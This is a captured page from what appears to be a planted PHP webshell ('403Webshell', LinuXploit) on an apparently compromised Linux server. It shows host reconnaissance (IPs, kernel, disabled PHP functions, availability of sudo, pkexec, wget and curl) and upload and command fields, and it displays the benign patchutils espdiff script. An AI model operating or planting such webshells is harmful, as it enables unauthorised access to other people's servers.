403Webshell
Server IP : 43.141.50.122  /  Your IP : 113.219.202.173
Web Server : Apache
System : Linux VM-8-5-opencloudos 6.6.34-9.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 19 19:35:45 CST 2024 x86_64
User : www ( 1000)
PHP Version : 8.1.27
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/bin/espdiff
#!/usr/bin/bash
#
# espdiff - do whatever it was you wanted
# Copyright (C) 2003 Tim Waugh <twaugh@redhat.com>

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

version() {
  echo "espdiff - patchutils version 0.4.2"
}

usage() {
  echo "usage: espdiff [OPTION...] [FILE...]"
}

deep_brainwave=0
recurse=0
compare=0
while [ "$#" -gt 0 ]
do
  case "$1" in
  --help)
	usage
	exit 0
	;;
  --version)
	version
	exit 0
	;;
  --deep-brainwave-mode)
	deep_brainwave=1
	shift
	;;
  --recurse)
	recurse=1
	shift
	;;
  --compare)
	compare=1
	shift
	;;
  --)
	shift
	break
	;;

  *)
	break
	;;
  esac
done

for each in "$@"
do
  error=$(cat "$each" 2>&1 >/dev/null)
  if [ $? -ne 0 ]
  then
    echo >&2 "espdiff${error#cat}"
    exit 1
  fi
done

delay=3
if [ "$deep_brainwave" -ne 0 ]
then
  delay=$(($delay * 2))
fi

read -t $delay -p 'Please concentrate... ' || echo
echo 'No brainwave activity detected.  Aborting.'
exit 1

Youez - 2016 - github.com/yon3zu
LinuXploit